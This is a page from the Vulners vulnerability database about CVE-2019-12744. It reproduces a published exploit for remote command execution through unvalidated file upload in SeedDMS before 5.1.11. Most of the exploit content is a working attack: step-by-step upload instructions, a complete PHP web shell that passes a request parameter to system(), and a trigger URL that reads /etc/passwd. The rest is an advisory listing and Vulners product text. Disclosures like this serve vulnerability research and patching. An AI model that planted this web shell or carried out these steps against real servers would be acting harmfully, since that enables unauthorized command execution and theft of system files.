Vulners
Lucene search
SeedDMS versions < 5.1.11 - Remote Command Execution
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | SeedDMS versions < 5.1.11 - Remote Command Execution Exploit | 26 Jun 201900:00 | – | zdt |
| Seeddms 5.1.10 - Remote Command Execution (Authenticated) Exploit | 25 Jun 202100:00 | – | zdt |
 | Exploit for Unrestricted Upload of File with Dangerous Type in Seeddms | 24 Jun 202112:58 | – | githubexploit |
 | CVE-2019-12744 | 21 Sep 202104:42 | – | circl |
 | CVE-2019-12744 | 20 Jun 201916:26 | – | cve |
 | CVE-2019-12744 | 20 Jun 201916:26 | – | cvelist |
 | Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated) | 25 Jun 202100:00 | – | exploitdb |
 | SeedDMS versions 5.1.11 - Remote Command Execution | 24 Jun 201900:00 | – | exploitpack |
 | CVE-2019-12744 | 20 Jun 201917:15 | – | nvd |
 | CVE-2019-12744 | 20 Jun 201917:15 | – | osv |
10
# Exploit Title: [Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11]
# Google Dork: [NA]
# Date: [20-June-2019]
# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)
# Vendor Homepage: [https://www.seeddms.org]
# Software Link: [https://sourceforge.net/projects/seeddms/files/]
# Version: [SeedDMS versions <5.1.11] (REQUIRED)
# Tested on: [NA]
# CVE : [CVE-2019-12744]
Exploit Steps:
Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.
PHP Backdoor Code:
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jun 2019 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 26
CVSS 37.5
EPSS0.32766